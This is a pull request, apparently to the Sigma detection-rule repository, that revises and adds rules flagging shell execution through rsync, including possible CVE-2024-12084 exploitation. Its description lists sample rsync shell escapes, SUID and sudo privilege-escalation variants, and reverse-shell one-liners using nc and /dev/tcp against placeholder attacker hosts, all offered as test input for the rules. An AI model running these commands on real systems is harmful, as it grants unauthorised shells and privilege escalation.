### PR TITLE
Rsync exploitation

### DIFF
--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml
@@ -2,11 +2,12 @@ title: Shell Execution via Rsync - Linux
 id: e2326866-609f-4015-aea9-7ec634e8aa04
 status: experimental
 description: |
-    Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+    Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
 references:
     - https://gtfobins.github.io/gtfobins/rsync/#shell
-author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth
 date: 2024-09-02
+modified: 2025-01-18
 tags:
     - attack.execution
     - attack.t1059
@@ -15,15 +16,29 @@ logsource:
     product: linux
 detection:
     selection_img:
-        Image|endswith: '/rsync'
+        Image|endswith:
+            - '/rsync'
+            - '/rsyncd'
         CommandLine|contains: ' -e '
     selection_cli:
         CommandLine|contains:
-            - 'sh 0<&2 1>&2'
-            - 'sh 1>&2 0<&2'
-    selection_null:
-        CommandLine|contains: '/dev/null'
+            - '/ash '
+            - '/bash '
+            - '/dash '
+            - '/csh '
+            - '/sh '
+            - '/zsh '
+            - '/tcsh '
+            - '/ksh '
+            - "'ash "
+            - "'bash "
+            - "'dash "
+            - "'csh "
+            - "'sh "
+            - "'zsh "
+            - "'tcsh "
+            - "'ksh "
     condition: all of selection_*
 falsepositives:
-    - Unknown
+    - Legitimate cases in which "rsync" is used to execute a shell
 level: high

--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
@@ -23,12 +23,12 @@ detection:
         Image|endswith:
             - '/ash'
             - '/bash'
-            - '/dash'
             - '/csh'
-            - '/sh'
-            - '/zsh'
-            - '/tcsh'
+            - '/dash'
             - '/ksh'
+            - '/sh'
+            - '/tcsh'
+            - '/zsh'
     filter_expected:
         CommandLine|contains: ' -e '
     condition: selection and not 1 of filter_*

--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
@@ -2,7 +2,7 @@ title: Suspicious Invocation of Shell via Rsync
 id: 297241f3-8108-4b3a-8c15-2dda9f844594
 status: experimental
 description: |
-    Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084.This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+    Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
 references:
     - https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/
     - https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10
@@ -29,9 +29,9 @@ detection:
             - '/sh'
             - '/tcsh'
             - '/zsh'
-    filter_expected:
+    filter_main_expected:
         CommandLine|contains: ' -e '
-    condition: selection and not 1 of filter_*
+    condition: selection and not 1 of filter_main_*
 falsepositives:
     - Unknown
 level: high

--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
@@ -1,0 +1,37 @@
+title: Suspicious Invocation of Shell via Rsync
+id: 297241f3-8108-4b3a-8c15-2dda9f844594
+status: experimental
+description: |
+    Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084.This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
+references:
+    - https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/
+    - https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10
+author: Florian Roth
+date: 2025-01-18
+tags:
+    - attack.execution
+    - attack.t1059
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection_img:
+        ParentImage|endswith:
+            - '/rsync'
+            - '/rsyncd'
+    selection_cli:
+        Image|endswith:
+            - '/ash'
+            - '/bash'
+            - '/dash'
+            - '/csh'
+            - '/sh'
+            - '/zsh'
+            - '/tcsh'
+            - '/ksh'
+    filter_expected:
+        CommandLine|contains: ' -e '
+    condition: all of selection_* and not 1 of filter_*
+falsepositives:
+    - Unknown
+level: high

--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
@@ -16,11 +16,11 @@ logsource:
     category: process_creation
     product: linux
 detection:
-    selection:
+    selection_parent:
         ParentImage|endswith:
             - '/rsync'
             - '/rsyncd'
-    selection_cli:
+    selection_shells:
         Image|endswith:
             - '/ash'
             - '/bash'
@@ -32,7 +32,7 @@ detection:
             - '/zsh'
     filter_expected:
         CommandLine|contains: ' -e '
-    condition: selection and not 1 of filter_*
+    condition: all of selection_* and not 1 of filter_*
 falsepositives:
     - Unknown
 level: high

--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
@@ -16,7 +16,7 @@ logsource:
     category: process_creation
     product: linux
 detection:
-    selection_parent:
+    selection:
         ParentImage|endswith:
             - '/rsync'
             - '/rsyncd'

--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
@@ -20,7 +20,6 @@ detection:
         ParentImage|endswith:
             - '/rsync'
             - '/rsyncd'
-    selection_shells:
         Image|endswith:
             - '/ash'
             - '/bash'
@@ -32,7 +31,7 @@ detection:
             - '/zsh'
     filter_expected:
         CommandLine|contains: ' -e '
-    condition: all of selection_* and not 1 of filter_*
+    condition: selection and not 1 of filter_*
 falsepositives:
     - Unknown
 level: high

--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
@@ -11,6 +11,7 @@ date: 2025-01-18
 tags:
     - attack.execution
     - attack.t1059
+    - attack.t1203
 logsource:
     category: process_creation
     product: linux

--- a/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
+++ b/rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml
@@ -15,7 +15,7 @@ logsource:
     category: process_creation
     product: linux
 detection:
-    selection_img:
+    selection:
         ParentImage|endswith:
             - '/rsync'
             - '/rsyncd'
@@ -31,7 +31,7 @@ detection:
             - '/ksh'
     filter_expected:
         CommandLine|contains: ' -e '
-    condition: all of selection_* and not 1 of filter_*
+    condition: selection and not 1 of filter_*
 falsepositives:
     - Unknown
 level: high


### PR DESCRIPTION
<!--
Thanks for your contribution. Please make sure to fill the contents of this template with the necessary information to ease and speed up the review process.

!!! PLEASE DO NOT DELETE ANY SECTION, COMMENT OR THE CONTENT OF THE TEMPLATE. !!!
-->

### Summary of the Pull Request

<!--
**Please note that this section is required and must be filled**
A short summary of your pull request.
-->

I reworked the rule for suspicious rsync invocations and added a new one that is supposed to detect rsync exploitations in a generic way (e.g. CVE-2024-12084 https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/ ). Since it's more a generic rule than a specific detection for an exploitation of CVE-2024-12084 I decided to not add it to the emerging-threats rule set but add it to the standard set. 

The old rule for suspicious rsync invocations with the -e flag had a wrong description and far too specific strings in the selection. I wonder if this ever matched anywhere. I composed a list of examples so that everyone can understand why the previous values were too specific and show the variety of way in which such a command could be written. 

### Changelog

<!--
** Don't remove this comment **
You need to add one line for every changed file of the PR and prefix one of the following tags:
new:	<title>
update:	<title> - <optional comment>
fix:	<title> - <optional comment>
remove:	<title> - <optional comment>
chore: for non-detection related changes (e.g. dates/titles) and changes on workflow

e.g.
new: Brute-Force Attacks on Azure Admin Account
update: Suspicious Microsoft Office Child Process - add MSPUB.EXE
fix: Malware User Agent - remove legitimate Firefox UA
chore: workflow - update checkout version
remove: Suspicious Office Execution - deprecated in favour of 8f922766-a1d3-4b57-9966-b27de37fddd2
-->

new: suspicious shell invocation via rsync without the -e flag
update: made the far too narrow existing rsync rule more generic

### Example Log Event

<!--
Fill this in case of false positive fixes
-->

Examples for rsync invocations 
```bash
# Basic Shell Escapes
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e 'bash -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/bash -i' 127.0.0.1:/dev/null
rsync -e 'dash -c "dash 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/dash -i' 127.0.0.1:/dev/null
rsync -e 'zsh -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/zsh -i' 127.0.0.1:/dev/null
rsync -e 'ksh -c "ksh 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/bin/ksh -i' 127.0.0.1:/dev/null
rsync -e 'busybox sh' 127.0.0.1:/dev/null
rsync -e 'busybox ash' 127.0.0.1:/dev/null
rsync -e 'fish -c "fish 0<&2 1>&2"' 127.0.0.1:/dev/null
rsync -e '/usr/bin/fish -i' 127.0.0.1:/dev/null

# Abusing SUID with Different Shells
./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'bash -p -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'zsh -p -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
./rsync -e 'ksh -p -c "ksh 0<&2 1>&2"' 127.0.0.1:/dev/null

# Abusing Sudo Permissions
sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'bash -c "bash 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'zsh -c "zsh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo rsync -e 'sh -c "/bin/sh 0<&2 1>&2"' 127.0.0.1:/dev/null

# Using Netcat for Reverse Shells
rsync -e 'sh -c "nc -e /bin/sh attacker-ip attacker-port"' 127.0.0.1:/dev/null
rsync -e 'bash -c "bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1"' 127.0.0.1:/dev/null
rsync -e 'zsh -c "zsh -i >& /dev/tcp/attacker-ip/attacker-port 0>&1"' 127.0.0.1:/dev/null
```

### Fixed Issues

<!--
Link the fixed issues here, in case your commit fixes issues with rules or code
-->

### SigmaHQ Rule Creation Conventions

- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/)
